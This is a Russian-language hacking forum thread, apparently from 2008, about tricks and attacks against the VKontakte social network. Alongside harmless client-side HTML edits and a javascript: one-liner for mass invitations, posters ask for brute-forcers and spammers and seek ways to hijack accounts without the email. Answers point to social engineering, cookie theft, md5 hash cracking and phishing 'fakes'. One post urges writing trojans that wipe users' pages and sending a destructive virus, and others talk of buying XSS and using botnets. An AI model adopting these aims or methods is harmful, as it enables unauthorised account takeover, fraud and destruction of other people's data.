
<script type="text/javascript">
function showHideInfo() {
if (ge('infoShown').value == 1) {
hide('rateInfo');
ge('infoShown').value = 0;
ge('infoShowLink').innerHTML = 'подробнее...';
} else {
ge('infoShown').value = 1;
show('rateInfo');
ge('infoShowLink').innerHTML = 'скрыть';
}
}
</script>

<div id="msg" style="margin:0px 10px 10px 10px">Вы не можете проголосовать за Алексея, пока не завалидировали ни один голос.</div>

<div class="privacy_panel" style="margin: 0px auto 0px auto; width:480px">
<div class="privacy_panel_editor" style="width:478px">
<div class="privacy_panel_border">
<h2 style="margin:5px 10px">Текущий рейтинг Алексея</h2>
<div class="privacy_panel_settings" style="text-align:left; margin:0px;padding:0px">

<div style="padding:0px 0px 10px 13px">

<div id="rateGold">
<div id="percentGold" style="width:100px">6235</div>
<div class="clearFix">
<div id="rateLeftGold" style="width:398px">&nbsp;
</div>
<div id="rateRightGold" style="width:0px">&nbsp;
</div>
</div>
</div>
</div>

<h2 style="margin: 5px 10px">Что такое рейтинг?</h2>

<div style="margin:10px 17px 10px 20px; line-height: 140%;">
<input type="hidden" id="infoShown" name="infoShown" value="0">
При помощи рейтинга популярности <b>ВКонтакте</b> предоставляет пользователям возможность определять порядок вывода участников при поиске, в списках друзей, в списках участников групп и т.д. <small><a id="infoShowLink" href="javascript: showHideInfo();">подробнее...</a></small><br /><br />

<div id="rateInfo" style="display:none">
<div style="float:left; margin:5px 20px 5px 0px; border:1px solid #DAE1E8"><img src="images/pics/rateSample.gif"></div>

Таким образом, в поиске первыми всегда выводятся активные, уважаемые, популярные и красивые люди.<br /><br />
Если Вы хотите увеличить рейтинг <b>Алексею</b>, выразить ему уважение или симпатию, Вы можете <b>отдать</b> за него голос.<br /><br />
Для того, чтобы избежать спама и накруток, мы просим Вас завалидировать Ваш голос с помощью <b>SMS</b> на номер <b>4444</b> с текстом:
<div style="text-align:center; font-weight: bold; border:1px solid #DAE1E8; width: 200px; padding:5px 0px; margin:10px 10px 10px 142px; background-color:#F6F7F9">id3191437</div>
<b>SMS</b> должна содержать только текст <b>id3191437</b> - и ничего кроме этого. <b>SMS</b> стоит приблизительно <a href='topic2269247'><b>$0.30</b></a> без <b>НДС</b> и на данный момент принимается на территории России, Украины и Казахстана.<br><br>Если Вы хотите проголосовать сразу за <b>10</b> Ваших друзей, Вы можете отправить <b>SMS</b> с точно таким же текстом на номер <b>4449</b> (<a href='topic2269838'>около <b>$3</b></a>).<br /><br />
После отправки <b>SMS</b> в меню в левой части страницы появится уведомление о текущем количестве голосов. Вы сможете проголосовать за любого пользователя <b>ВКонтакте</b>, нажав на его рейтинг.<br /><br />
Уведомление или поздравление от Вас, пример которого приведен выше, будет некоторое время показываться пользователю, после чего будет сохранено в его разделе <b><a href='rate.php'>Статистика</a></b>.<br /><br />
Дополнительную информацию о голосовании и рейтинге можно найти на странице <a href='rate.php?act=help'><b>Статистика: Помощь</b></a>.

</div>
</div>


</div>
</div>
</div>
</div>


<div style="height:35px; padding-bottom:15px;">
<ul class='nNav' style="margin:15px 10px 0px 220px;">
<li style="margin-left:0px">
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span class="ncc"><a href="id1004596">Вернуться к странице Алексея</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li>
</ul>
</div>

<div id="boxHolder"></div>

</div>
</div>
</div>

</div>

<!-- End pageBody -->

Попробывал изменить на = <div class="rateHelp">
<div id="rateGold">
<div id="percentGold" style="width:100px">7777</div>
<div class="clearFix">
<div id="rateLeftGold" style="width:380px">&nbsp;</div>
<div id="rateRightGoldt" style="width:18px">&nbsp;</div>
</div> Опять же в первый раз изменяется - а после обновления возвращается обратно! Получается эта инфа хранится где-то в другом месте... У кого есть какие идеи на этот счет!?
</div>

ты сам не понимаешь сто несешь!
Когда ты перезаргрузаешь страничку она запрашивается с сервера!
Я раньше хекал так сайты)) находил xss и бля вот я какой крутой хакер похекал все сайты! даже mail.ru

http://vkontakte.ru/blank.php?code=10
Дезинфекция НАХ!

А если она запрашивается с сервера = то почему когда я изменил дату рождения на 777 и год 2111, и поставил замужем сам за собой - именно таким образом - то все было намана! А с рейтингом так не прокатывает!? И как быть насчет бана!?

А если она запрашивается с сервера = то почему когда я изменил дату рождения на 777 и год 2111, и поставил замужем сам за собой - именно таким образом - то все было намана! А с рейтингом так не прокатывает!? И как быть насчет бана!?

Блин тыже у себя на компе в файлике изменил!
Открою тебе секрет: когда ты открываешь страничку vkontakte.ru ты скачиваешь ее себе на компьютер!Только тихо! никому не говори а то узнают! ой пропалился!

Блин тыже у себя на компе в файлике изменил!
Открою тебе секрет: когда ты открываешь страничку vkontakte.ru ты скачиваешь ее себе на компьютер!Только тихо! никому не говори а то узнают! ой пропалился!

хых :) (шутник)

Блин тыже у себя на компе в файлике изменил!
Открою тебе секрет: когда ты открываешь страничку vkontakte.ru ты скачиваешь ее себе на компьютер!Только тихо! никому не говори а то узнают! ой пропалился!
жжешь +1

Никто не знает, как массово разослать приглашения в группу (не друзей) или массово пригласить друзей?
Я конечно понимаю, что скорее всего нельзя, но все же...

AdReNa1!Ne,хз, че такое просто видел где-то вконтакте))))

=============================================
ЧТОБЫ ПРИГЛАСИТЬ ВСЕХ СВОИХ ДРУЗЕЙ ЗА 5 СЕКУНД
1) Нажимаем "пригласить на встречу"
2) СТИРАЕМ все из адресной строки и КОПИРУЕМ туда содержимое:

javas cript:for(var i = 0; i < 5000; i++) document.inviteFriends.elements[i].checked = true;

3) Стираем пробел между "javas" и "cript", нажимаем ENTER
4) Все друзья выделятся сразу!
5) Нажимаем "Выслать приглашение"
=============================================

AdReNa1!Ne,хз, че такое просто видел где-то вконтакте))))

=============================================
ЧТОБЫ ПРИГЛАСИТЬ ВСЕХ СВОИХ ДРУЗЕЙ ЗА 5 СЕКУНД
1) Нажимаем "пригласить на встречу"
2) СТИРАЕМ все из адресной строки и КОПИРУЕМ туда содержимое:

javas cript:for(var i = 0; i < 5000; i++) document.inviteFriends.elements[i].checked = true;

3) Стираем пробел между "javas" и "cript", нажимаем ENTER
4) Все друзья выделятся сразу!
5) Нажимаем "Выслать приглашение"
=============================================
неработает уже давно

рабочий брут под контакт есть у кого?желательно поновей ...

дык сам то старый переделай ...

Подскажите, как поставить дату рождения, отличную от дат из списка? А то я видел чела с датой рождения 99.99.0000

лехко, найди прогу для перехвата хттп-заголовков

ну или в хтмл коде изменить и отправить запрс

а фотографии закрытых групп просмотреть никак?

если отредактировать название группы, так чтобы переводов строки было определенное количество, то все надписи будут песочного цвета.

http://vkontakte.ru/club1139481

Ужасаюсь,я прочитал всё от 1-ой до последней страницы и не нашёл ничего интересного.
Повторяются одни и теже фразы на протяжении всей темы :
фотографии закрытых групп просмотреть никак?
как узнать кто оставил о тебе мнение?
У кого нибудь есть спамер рабочий на стену?

ну примерно в таком духе,скоко можно?Раскатили тему на 31 страницу и реально ничего толкового в ней не написали,без обид...мне жаль потраченного времени.

можно ли ломануть акк незная мыла?

Ужасаюсь,я прочитал всё от 1-ой до последней страницы и не нашёл ничего интересного.
Повторяются одни и теже фразы на протяжении всей темы :

ну примерно в таком духе,скоко можно?Раскатили тему на 31 страницу и реально ничего толкового в ней не написали,без обид...мне жаль потраченного времени.

Ну правильно, всем интересно, в то же время самому ничего делать не хочется. Вот и получаются такие темы.

сейчас насколько я знаю багов нет серьезных, и спамера нет работающего...

Подскажите, как поставить дату рождения, отличную от дат из списка? А то я видел чела с датой рождения 99.99.0000
Записываю как женить себя на себе . Делать лучше через оперу
заходите в http://vkontakte.ru/profileEdit.php Выбераете Женат, делайте в опере просмотр хтмл кода. Ищите строки вида <option value = 'чейто номер'>Кто то там</option> вставляете свое тогда <option value = 'ваш ид'>Я</option> сохраняете страницу и выбераете в списке женат на Я. Сохранить и все Еще работает, только что проверил

можно менять года (рождения, учебы в универе/школе и т. д.). Делается таким же способом, как и женитьба на самом себе: редактируете в опере страничку... У меня стоит 777 августа 2010 года ))) если поставить какой-нить 11112008 год рождения, то ваш возраст будет минус 1111000...

сейчас насколько я знаю багов нет серьезных, и спамера нет работающего... Кстати, раз нет серьезных багов на ВК, может будем искать на одноклассниках и www.navstreche.com!?

Записываю как женить себя на себе . Делать лучше через оперу
заходите в http://vkontakte.ru/profileEdit.php Выбераете Женат, делайте в опере просмотр хтмл кода. Ищите строки вида <option value = 'чейто номер'>Кто то там</option> вставляете свое тогда <option value = 'ваш ид'>Я</option> сохраняете страницу и выбераете в списке женат на Я. Сохранить и все Еще работает, только что проверил

можно менять года (рождения, учебы в универе/школе и т. д.). Делается таким же способом, как и женитьба на самом себе: редактируете в опере страничку... У меня стоит 777 августа 2010 года ))) если поставить какой-нить 11112008 год рождения, то ваш возраст будет минус 1111000...
я уже здесь давно это написал, не бояним и не копипастим

однокласники не стоят того. главное это чтоб спамер написали

однокласники не стоят того. главное это чтоб спамер написали
Да, насчет спамера полностью согласен! Нужно сайтик один прорекламировать! :)

Блин, мою группу в контакте удалили и всех моих ботов тоже... Даже под собственной анкетой зайти не могу!? Кто знает - как быть в такой ситуации?

Блин, мою группу в контакте удалили и всех моих ботов тоже... Даже под собственной анкетой зайти не могу!? Кто знает - как быть в такой ситуации?
а никак... месть - удаление групп мусоров aka гибдд и прочего мусора типа администрации сервиса... :)

а никак... месть - удаление групп мусоров aka гибдд и прочего мусора типа администрации сервиса... = верно подметил или взломать анкету всех их модераторов и админов))

пипл как можно разослать одно сообщение сразу всем друзьям?

идешь на
http://vkontakte.ru/mail.php?act=write
далее в опере правишь исходник: меняешь тег инпут members_name на тег текстареа, далее эплай чейнджес и начинаешь вставлять в появившуюся форму имена друзей по одному, когда он отметит человека крестиком значит можно кидать следующего.

да там всё проще
заходишь на _http://vkontakte.ru/mail.php?act=write
и по алфавиту вписываешь буквы в поле "кому" он предлагает подставить имена из списка.

спс , но максимум 15 адресатов :( , но хоть чтото

Подскажите с чего должно начинаться название группы чтоб она была первая в списках...????

4NT1P0V
список который в профиле идет по дате создания группы, а тот который по адресу http://vkontakte.ru/groups.php - по численности участников.

РЕбята как аккаунт взломать.. если я мыла не знаю...

Соц.инженерия или _http://mailp.ru/

Всем привет! Нужна помощь, есть доступ к аккаунту, т.е. захожу спокойно - мне нужно узнать какие сообщения человек получал и отсылал! Там в обычном списке сообщений нет, - удалили! Я думаю раз даже удаленные и забаненные аккаунты хранятся, также как и любое видео и фото - сообщения тоже должны где то сохранятся!? Никто не знает где их можно достать!?

Хм..как мысль - все сообщение могту действительно удалятся.
Или нет, копироваться на "внутреннюю" базу данных.

даже если они и хранятся врядли кто тебе их восстановит

нах хранить удалённые сообщения? тупость....

не тупость.. потом можно по логам отследить переписку...

Система следующая: сообщениям присваивается номер в зависимости от очреди. Т. е. написа какой-то юзер сообщение - ему присвоили номер N... за ним еще кто-то написал - этому сообщению присвоят номер N+1... и т. д. Впринципе, если сообщения из БД не удаляют, то просмотреть их можно. Но их могут и удалять.... Я не проверял.

если сообщения и хранятся то они наверняка фильтруются будут они просто так тратить место на какуенибуть любовную хрень !! да и потом кто в сздравом уме будет осуждать что то дельное в контакте ... не все аське доверяют а тут контак !!

просто ппц на вконтакте стоит траяльный ajax загрузчик фотографий

ИТОГО: явных уязвимостей нет, или о них умалчивают (о причинах догадываюсь).
Тема превратилась в бесполезный флуд, по крайней мере до того момента, пока не будет выложено что-то дельное.

ИТОГО: явных уязвимостей нет, или о них умалчивают (о причинах догадываюсь).
Тема превратилась в бесполезный флуд, по крайней мере до того момента, пока не будет выложено что-то дельное.
согласен .... всё это трёп без идей без опытов без всего ... токо сидим догадками обмениваемся и сразу замечу не очень оригинальными !!!

Хм... К сожалению так и есть... С каждым днем его все больше укрепляют! Может все таки действительно перейдем на хак другой соц. сети = к примеру такой как www.navstreche.com!? А никто не пытался получить доступ к админке ВК!?

Кстати, не могу понять - почему если ты выбираешь удалить свою страницу! Потом достаточно зайти под своим логином и паролем - зайти в настройки - и страница опять будет восстановлена!? Зачем это нужно в таком случае!?

Хм... К сожалению так и есть... С каждым днем его все больше укрепляют! Может все таки действительно перейдем на хак другой соц. сети = к примеру такой как www.navstreche.com!? А никто не пытался получить доступ к админке ВК!?

Кстати, не могу понять - почему если ты выбираешь удалить свою страницу! Потом достаточно зайти под своим логином и паролем - зайти в настройки - и страница опять будет восстановлена!? Зачем это нужно в таком случае!?
ну например чтобы тупо крысятничать-ты смотришь, а к тебе зайти не могут....

www.navstreche.com ))) какой интерес переходить на малоизвестную соц. сеть, только если на одноклассники

короче это делается так:


Заходим через оперу и редактируем название, нажимаем ctrl+F3 и ищем название группы а над ним <input type='text' class='inputText' id='name' name='name' maxlength='100' size='50' autocomplete='off' это мы выделяем и заменяем на <textarea name="name" style="width:200px;height:100px"></textarea>.
само название группы снизу удаляем и нажимаем применить изменения.
мы оказываемся на странице редактирования названия группы и в поле название вписываем её название.
чтоб она выделялась жмем к примеру 2 раза ентер потом название группы и снова 2 раза ентер и сохранить!
и все! название группы большое))))

Надеюсь статья пригодится
© 4NT1P0V
Вроде кто-то про эти теги тут спрашивал... :)

нажимаем применить изменения.
песдец, пойду новости майкрософта менять

сто раз уже об этом писали. баян

покажи где? я не нашел!

забыл (c) 4NT1P0V

Супер спасибо!

Как просматривать скрытые фото(защищенные настройками приватности).. ? Делаю все как сказано - меняю "m" на "x" = 404 Not Found (((

Как просматривать скрытые фото(защищенные настройками приватности).. ? Делаю все как сказано - меняю "m" на "x" = 404 Not Found (((

Ппц, а почитать тему с начала религия не позволяет? Это давно уже пофиксино...

Нашел сегодня интересную группу - http://vkontakte.ru/club218165
В ней анимированная фотография, как так сделать?
При загрузки этой же фотографии в свою группу анимация пропадает.

нет меня вот это очень радует...ты не пытался тоже загрузить анимированную фото?

Извините, я не могу больше сдерживаться. (баньте меня, но пост не стирайте)
ВЫ ЗАДОЛБАЛИ СО своим долбанным вконтактом, все темы о нем... пишут брутеры НУ А НАХРЕНА?? раньше я понимаю хотябы для мыл\асек\шеллов писали..
но блядь Вконтакте.. ну кому нужен этот говносайт? а особенно меня радует (недавно)
на exploit.in человек спросил "а у вас есть ПРИВАТНЫЕ приколы с вконтакта?"
вы кто ?? забыли чтоли кто вы такие к чему стремитесь?
хватит страдать ***ней и разводить этот бред на 35 долбанных страниц.
как мухи на говно налетеле, В БИОРЕАКТОР ВСЕХ ВАС.
я предлагаю хотябы писать трои\фейки(автоматы) для этого говносайта, чтобы стереть как можно больше страниц моральных уродов, часами жмущих Ф5 в ожидании нового коммента.
недавно вон у вас 1 запостил в "ПРИВАТ" знаенте что?
а я вас скажу. ВОТ ЧТО "хотите изменить дату своего рождения вконтакте:? я скажу как.... и тд"
мда.. а раньше в приват клали связки, сплоенты, крипторы. вы совсем ебанулись со своим вконтактом.
74,518 долбанных просмотров этой дебильной темы... ни денег ни известности это не даст \= прекращайте ***ней страдать.
ОДУМАЙТЕСЬ! СТИРАЙТЕ НАХРЕН СТОЛЬКО СТРАНИЦ, СКОЛЬКО МОЖЕТЕ! Бейте епала всем вконтакчикам. вместо пинча шлите закрептованный "чернобыль" этим уродам.
всем спасибо. Не стирайте пост!

Я пацталом...Ты дебил!
Я не в праве тебя оскорблять, но ведь это так!!
Люди делом заняты, думают! Уверен - тебе это не по силам...

нет ну надож такое написать, просто псих, слов нет
надо же быть таким профаном чтобы такое писать
больше всего порадовало вот это-"я предлагаю хотябы писать трои\фейки(автоматы) для этого говносайта, чтобы стереть как можно больше страниц моральных уродов"
была б возможность снизил те репу на 10 минимум
P.s.Сори за флуд.

Насчет "не даст денег" ты заблуждаешься.

нет ну надож такое написать, просто псих, слов нет
надо же быть таким профаном чтобы такое писать
больше всего порадовало вот это-"я предлагаю хотябы писать трои\фейки(автоматы) для этого говносайта, чтобы стереть как можно больше страниц моральных уродов"
была б возможность снизил те репу на 10 минимум
P.s.Сори за флуд.
я имею ввиду что фейк при получении пасса (пэхэпэ) идет и стерает строницу.(заменяет)
з.ы. поговори ищё о "была б возможность"
з.ы.з.ы. сори за флуД, но заебал вконтакт

o_0 А чо такое "Ф5"?
Ладно, шучу...
Если парень завидует славе разработчиков вконтакте - мания величия.
Если парень хочет бить, простите, личики всем, кто там сидит - психопат.
Если парень знает, что такое биоредактор - <в комментах не нуждается>
Если парень не знает элементарных правил русского языка - марш с ачата и за прописи.

Имхо каждый стремится к тому, что хочет. Кто-то хочет хакнуть крутой сайт, кто-то хочет замутить ботнет в 15 тыщ рыл, а кто-то хочет мало-помалу хакать и делать свое портфолио в соцсетях. А может у человека там девушка? Почему бы не выкладывать фотки своим знакомым, друзьям?

Парень, на будущее тебе: не лезь на рожон, дабы не будешь побитым (c) Не помню, кто...

я имею ввиду что фейк при получении пасса (пэхэпэ) идет и стерает строницу.(заменяет)
з.ы. поговори ищё о "была б возможность"
з.ы.з.ы. сори за флуД, но заебал вконтакт
Ты видать фильмов насмотрелся, что тут втираешь про какие то супер фейки, и ещё если тебя вконтакте за*бал, то на*уя ты тут пишешь иди пиши там где тусуют такие же вконтактеры как ты, или к павлу дурову напиши...

я имею ввиду что фейк при получении пасса (пэхэпэ) идет и стерает строницу.(заменяет)
з.ы. поговори ищё о "была б возможность"
з.ы.з.ы. сори за флуД, но заебал вконтакт
но это уже дело XSS, "стерает строницу.(заменяет)"?
ах да и можно общаться на русском?ну не на языке падонгафф
Поговорить о "была б возможность"?была бы поставил, была бы у простых юзеров возможность у тя была б ща репа -100 минимум :)

Извините, я не могу больше сдерживаться. (баньте меня, но пост не стирайте)
ВЫ ЗАДОЛБАЛИ СО своим долбанным вконтактом, все темы о нем... пишут брутеры НУ А НАХРЕНА?? раньше я понимаю хотябы для мыл\асек\шеллов писали..
но блядь Вконтакте.. ну кому нужен этот говносайт? а особенно меня радует (недавно)
на exploit.in человек спросил "а у вас есть ПРИВАТНЫЕ приколы с вконтакта?"
вы кто ?? забыли чтоли кто вы такие к чему стремитесь?
хватит страдать ***ней и разводить этот бред на 35 долбанных страниц.
как мухи на говно налетеле, В БИОРЕАКТОР ВСЕХ ВАС.
я предлагаю хотябы писать трои\фейки(автоматы) для этого говносайта, чтобы стереть как можно больше страниц моральных уродов, часами жмущих Ф5 в ожидании нового коммента.
недавно вон у вас 1 запостил в "ПРИВАТ" знаенте что?
а я вас скажу. ВОТ ЧТО "хотите изменить дату своего рождения вконтакте:? я скажу как.... и тд"
мда.. а раньше в приват клали связки, сплоенты, крипторы. вы совсем ебанулись со своим вконтактом.
74,518 долбанных просмотров этой дебильной темы... ни денег ни известности это не даст \= прекращайте ***ней страдать.
ОДУМАЙТЕСЬ! СТИРАЙТЕ НАХРЕН СТОЛЬКО СТРАНИЦ, СКОЛЬКО МОЖЕТЕ! Бейте епала всем вконтакчикам. вместо пинча шлите закрептованный "чернобыль" этим уродам.
всем спасибо. Не стирайте пост!
если звезды зажигаются значит это кому то надо , тем кто в теме по крайней мере... :) ты не в теме)

если звезды зажигаются значит это кому то надо , тем кто в теме по крайней мере... :) ты не в теме)
а ты в теме чтоле \= *?
у тя была б ща репа -100 минимум
ах да, а ну бегом на защиту гребанного вконтагта. понижаем репу (мне на неё по***)

Ты видать фильмов насмотрелся, что тут втираешь про какие то супер фейки
ты чо, пхп не знаешь? чел вводит логин пасс идет обычный пост запросы на удаление всего со страницы \=

А может у человека там девушка?
если бы моя девушка стала вконтакте сидеть я бы её в реку сбросил \=

Гыгы, крик души)

Вопрос: как поменять в опере инпут на textarea? что-то не могу найти(

изменить тип поля где нужно

есть <input value=TEST> а есть <textarea>TEST</textarea>. ппц...

он спрашивает как на вконтакте

какая разница где? в опере просто меняешь и ф5 \=

266948 (17:59:51 29/04/2008)
привет тут?

266948 (18:00:02 29/04/2008)
я дон1`2, хотел бы коечто спросить

Dj (18:00:12 29/04/2008)
да, тут, но слегка занят

Ichi (18:00:24 29/04/2008)
ладно вечером спрошу

Dj (18:00:29 29/04/2008)
ну спрашивай

Dj (18:00:35 29/04/2008)
если это недолго

Ichi (18:00:51 29/04/2008)
вопрос про пост твой по поводу "если человек знает про биореактор..."

Ichi (18:00:59 29/04/2008)
почему не нужнаедся в комментах ?О_О

Dj (18:01:15 29/04/2008)
ну там не биореактор

Dj (18:01:18 29/04/2008)
а биоредактор

Dj (18:01:22 29/04/2008)
орфография сохранена

Ichi (18:01:22 29/04/2008)
ну почти

Dj (18:02:21 29/04/2008)
ну короч проехали

Dj (18:02:31 29/04/2008)
я б на твоем месте отказался бы от столь радикальных комментов

Ichi (18:04:08 29/04/2008)
1)почему? 2) почему мне всегда что-то советуют \=

Dj (18:04:36 29/04/2008)
отвечу кратко и без харизмы: по качану...

Ichi (18:05:01 29/04/2008)
забанят- похрену \= античат- тухлое место как и хакер.ру
толпы ламаков...

Dj (18:05:10 29/04/2008)
кх

Dj (18:05:12 29/04/2008)
кхм

Ichi (18:05:17 29/04/2008)
премер: хакер.ру Тема "взлом компа с бат файлом" -11 страниц.

Dj (18:05:20 29/04/2008)
ну-ка поясни, кто тут ламак?

Dj (18:05:34 29/04/2008)
ты меня тоже к ним классифицируешь, я так понял?

Ichi (18:05:39 29/04/2008)
ппц

Ichi (18:05:54 29/04/2008)
я не собираюсь ругаться так что пока. (я думал ты поймешь о ком я)

Dj (18:06:06 29/04/2008)
нет, не понимаю

Dj (18:06:18 29/04/2008)
поясни, кто тут ламак

Ichi (18:06:22 29/04/2008)
пример я выше привел

Ichi (18:06:31 29/04/2008)
про бат файл 11 страниц отписывать

Ichi (18:06:34 29/04/2008)
это нормально?

Dj (18:06:50 29/04/2008)
извиняй, но целыми форумами посылать в ламеры - надо иметь очень больную голову, ога?

Ichi (18:06:56 29/04/2008)
или в теме про скл инж.. постить ошибки сервака и спрашивать "А что дальше?"

Ichi (18:07:01 29/04/2008)
я говорю что там толпы

Ichi (18:07:05 29/04/2008)
их отсеивать надо

Dj (18:07:15 29/04/2008)
ну пойми, ты сам таким же был

Ichi (18:07:23 29/04/2008)
был, но на форумах не постил

Dj (18:07:26 29/04/2008)
или ты родился с сетевухой в жопе?

Dj (18:07:44 29/04/2008)
ладно, лир. отступление

Dj (18:07:52 29/04/2008)
короч просто говорю не радикаль на форумах

Dj (18:07:56 29/04/2008)
и все будет ок

Dj (18:07:57 29/04/2008)
ога?

Ichi (18:08:03 29/04/2008)
ладн, сорри если че, меня трава ждет

Dj (18:08:10 29/04/2008)
:-D

Dj (18:08:17 29/04/2008)
ну иди, иди

Dj (18:08:24 29/04/2008)
ниче, если я выложу лог в теме?)))

Наш великий философ - Don1=2...
Под ником Dj - я...

ОЧЕНЬ ПРОТЕВ \\= логи выложены без моего согласия

Как мне поменять свой статус семейного положения на произвольный текст?
Я пытался отправлять постом другие параметры. В иторе напротив семейного положения - пустота...

хах, никак-там идут статусы как id произвольного не прицепишь

Не, ну это ясно. Просто я как понял, там статус отображается поциферно. Вот я и подумал, мб это можно обойти...

нет там записывается id в базу данных и потом читается со страницы,
этот id фильтруется, если найдёт недопустимое значение, то сотрёт твой статус

А как все таки загрузить анимированную картинку...

берёшь анимированную картинку и загружаешь....

эта тема похожа на faq по браузерам+вконтакте \= че она во взломе делает?

ппц.. ребята... давайте будем постить тогда, когда нашли уязвимость? как я знаю их сейчас или нет, или они малозначущие..

представь сколько в день вконтакте роет багоискальщиков
сколько вконтакте скриптов?
если подумать то за день можно каждый перерыть. а вы все ищите ищите..... НЕТУ ТАМ БАГОВ

не спешил бы я на твоём месте так говорить)
я столько бабок уже с него снял))

всмысле за взломы чужих профилей?)

просьба - выложите инструкцию, как изменить тип ввода(input и textarea) в опере.
Пошагово!

всмысле за взломы чужих профилей?)
было пару раз, а вообще - нет, у меня свои прибыльные схемы СИ в соц сетях : )

скажите, пожалуйста!!!
как можно название группы индивидуализировать?))))))))
в смысле группа вот есть We love minimal, посмотрите. как она выделяется
http://vkontakte.ru/club366536
там написано, что тег br, но он не работает.

какие еще красивые есть способы выделения группы?

спасибо заранее

кароч. на сайте пока есть токо ХСС... но сам сайт стоит на nginx/0.5.35.
так что нада порискать по уязвимостям сервера...

Если кто-то знает активку ксс на вконтакте, отпишите в ПМ. Или за деньги куплю или еще как. Вобщем обсудим.

Споси родной контакт:
_http://vkontakte.ru/infested_ip_list.html
ношол случайно, м.б. байан))

Если вы хотите помочь освободить интернет от этой заразы:

* Возьмите любой IP из списка (если несколько похожих, берите весь список).
* Зайдите на nic.ru и введите в поле IP-адрес.
* Найдите там контактный E-Mail администратора (abuse@, security@, admin@ и.т.д).
* Отправьте администратору список зараженных IP, за которые он отвечает, и объясните, что 100% использовались для DDoS.

Помните: спамеры/ддосеры используют компьютеры ничего не подозревающих пользователей для своих целей.
Вы можете помочь людям избавиться от вирусов/троянов. Администраторы IP оповестят пользователей, что их IP заражены.
Хо боля дайте мне бот нет из пару миллионов пендосов я ураню их на не сколько лет

я мож че не так понял, но вы посмотрите на ошибки:
http://vkontakte.ru/bsadasdasdasn.html
http://vkontakte.ru/bdasdadadaan.php
в первой:
404 Not Found
nginx/0.5.35
а во второй:
Not Found

The requested URL /ban.php was not found on this server.
Apache/2.2.3 (Debian) PHP/5.2.0-8+etch10 Server at vkontakte.ru Port 80

наебыват чтоли?)
php и любое другое расширение?? нееет ведь /1.php дает тоже nginx
p.s. http://vkontakte.ru/ip.html тоже тот же лист )
и на ачате такая же хрень ,видимо сервак )

Don1=2
я думаю там не один сервер ;)

я думал, просто наепывают... не может там апача быть, кодер контакта-норк

с чего это неможет? А что по твойму там длжно стоять? Говно на лопате?

вот это стотейко

Бля, да чо вы ржете, риальная статьйа для риальных поцаноф!!! КУЛ!!! Пайду братве расскажу!
P.S. В "Уязвимостях" есть ветка для обсуждения vkontakt'e. Советую всю инфу касательно него постить туда.

4nt1p0v
На статью не тянет, тему перенести нужно просто в раздел "УЯЗВИМОСТИ".

угу где-то подобное уже описывалось

Кстати про названия групп..обычно меняем инпут на текстареа и все.
http://vkontakte.ru/club1005378
ну и из пред темы.
http://sverdlovesk.net/view/9744/
http://sverdlovesk.net/view/9743/
ну еще красивее http://sverdlovesk.net/view/9745/
так же работают теги.

Опа я еще кое чо нашол:
http://vkontakte.ru/blog.php?act=s&nid=100
можно читать комментарии к несуществующим новостям. Интересно если в качестве параметра nid - указать 1....50
напишет:
restricted

, что значит : ограниченно

кстати нашёл тупость-када отмечаешь когонить на фотке, в базу данных записывается инфа о данной отметке-имя, фамилия и ник на тот момент, а потом селектится из неё, а не селектится из базы с инфой о юзере

ппц вконтакте атакует DDos своих юзеров-после того как решил попробовать брутануть один акк, пошли логи антивируса и двух файрволов, решил отследить соединения-ивправду-при переборе паролей без прокси ip заносится в базу и атакуется юзерами контакта, которые сами и не подозревают об этом, у меня на ноуте аж дамп физической памяти начался т.к. перебило всю память))

Пипец. Так как поменять на текст-area? пошагово если можно

просматривал видео в одной группе, потом бац http://vkontakte.ru/video.php?gid=5074 =))

поднятия рейтинга в vkontakte? может у когото есть какието идеи?)

пс:

«Ведомости» опубликовали статью, в которой отмечается, что популярная в Рунете социальная сеть «ВКонтакте.ру», создателем которой считается «победитель олимпиад по лингвистике, информатике и дизайну» Павел Дуров, на самом деле принадлежит ООО «В контакте», основным учредителем которого (60% уставного капитала) является Вячеслав Мирилашвили, сын миллиардера Михаила Мирилашвили (mirilashvili.ru), который с 2003 года отбывает 8-летний срок по обвинению в создании организованной преступной группы.

Еще одним соучредителем ООО «В контакте» (10%), по данным «Ведомостей», является Лев Левиев, предприниматель, чье состояние, по версии журнала Forbes «The World’s Richest People», год назад оценивалось в $4,1 млрд.

«Ведомости» также отмечают, что, по данным «СПАРК-Интерфакс», на 1 февраля 2008 г. 100% ООО «В контакте» принадлежало оффшору Doraview Limited, зарегистрированному на Британских Виргинских островах.

Таким образом, развеян очередной миф об успешном стартапе, якобы созданном талантливым энтузиастом на свои собственные деньги.

а есть ли возможность просматривать удаленые сообщения?

а есть ли возможность просматривать удаленые сообщения?
такой возможности нет...
во всяком случае в паблике.

к примеру вот восстановление записей на стене:
когда удаляем сообщение мы проходим по ссылке "javascript: deletePost(id поста,ваш id)"
когда восстанавливаем "javascript:restorePost(id поста,ваш id)"
как пример найти id записи-посмотреть историю браузера(у меня сохраняются сами записи страниц точнее изменения на них)

также с сообщениями:
удалить javascript: delMsg(id, 0)
восстановить javascript:restore(id,0)

http://vkontakte.ru/friend.php?act=remove&id=<id>
<id> вводим id человека, которого хотим удалить :)
удалил самого себя из своего контакт листа :))

В контакте есть одмины!

http://vkontakte.ru/admin.php?act=fixed&wid=*** - это мну вышло когда я не свою фотку вставил)

))

мдя не хватате статусов админы он-лайн ))А их наверняка до жопы

Кто что может сказать по данному поводу (https://forum.antichat.ru/showthread.php?p=701115#post701115)

ктонить проверял?

ктонить проверял?

что именно?

Да не - Работает!

что именно?
флудер вконтекс

небольшой прикол:
http://vkontakte.ru/invite.php?m=4&email=%E1%EE%EB%FC%F8%EE%E3%EE%20%F7%EB%E5%ED%E0

ребят, тема с выдиранием куков на вконтакте еще работает?

смотря какая тема-так если выдерешь, то получишь md5 хэш, что мало вероятно узнать пароль

смотря какая тема-так если выдерешь, то получишь md5 хэш, что мало вероятно узнать пароль


нуу не скажи !

а md5.xek.cc и hashcracking.info на что??
если что можно сбрутить + отдать в тему на расшифровку!

вы сначала куки получите =Р

ну слишком долго брутить, на сайтах только маленькая часть всех хэшей :)

снифер в помощь :)

значит простого способа нету, придется юзать фейки

и брутфорсить до посинения
достаточно много акков снимается )

*deleted* :)

брутфорсик не выложите?

поиском не воспользуетесь?
http://forum.antichat.ru/showthread.php?t=69838

Спасибо)

неа, там все хитрее =(
короче не пашет. Работает только когды ты отмечаешь чела и она сразу срабатывает. При обновлений страницы не пашет. Тем более там фильтрация на кавычки и скобки. Короче бага типа в фильтре поиска.

